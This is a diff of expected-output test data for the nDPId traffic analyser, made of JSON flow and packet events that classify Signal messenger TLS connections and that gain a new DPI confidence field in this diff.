-00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
+00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01025{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
+00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
+00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
+00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264666,"flow_last_seen":1569051264666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569051264666,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569051264666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569051264666,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7CAbvJrSrvAAAAALAC\/\/+7dwAAAgQFtAEDAwcBAQgKKFWUiQAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569051264775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051264775,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sL5Zid4ya0q8KASaN+dwQAAAgQFrAQCCApkFUDdKFWUiQEDAwg="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1569051264776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051264776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7CAbvJrSrw+WYneYAQBAsw7wAAAQEICihVlPVkFUDd"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
+00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569051266396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV0AADQGy0wXORgQwKgCEQG73rjhiC89LB07wYAYAQKY+AAAAQEICpZOcwIoVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569051266396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0yV4AADQGy2MXORgQwKgCEQG73rjhiC9VLB07wYARAQL5ggAAAQEICpZOcwIoVP9f"}
@@ -108,31 +108,31 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569051267121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569051267121,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGbbHAqAIRDSP9Kt7DAbsjR8rsAAAAALAC\/\/\/U1AAAAgQFtAEDAwcBAQgKKFWeFwAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569051267154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051267154,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAPEG\/LQNI\/0qwKgCEQG73sO\/wI8zI0fK7aAScSCWtAAAAgQFrAQCCAqvNN\/RKFWeFwEDAwg="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569051267161,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051267161,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGbb3AqAIRDSP9Kt7DAbsjR8rtv8CPNIAQBAsybAAAAQEICihVnjqvNN\/R"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-01230{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, 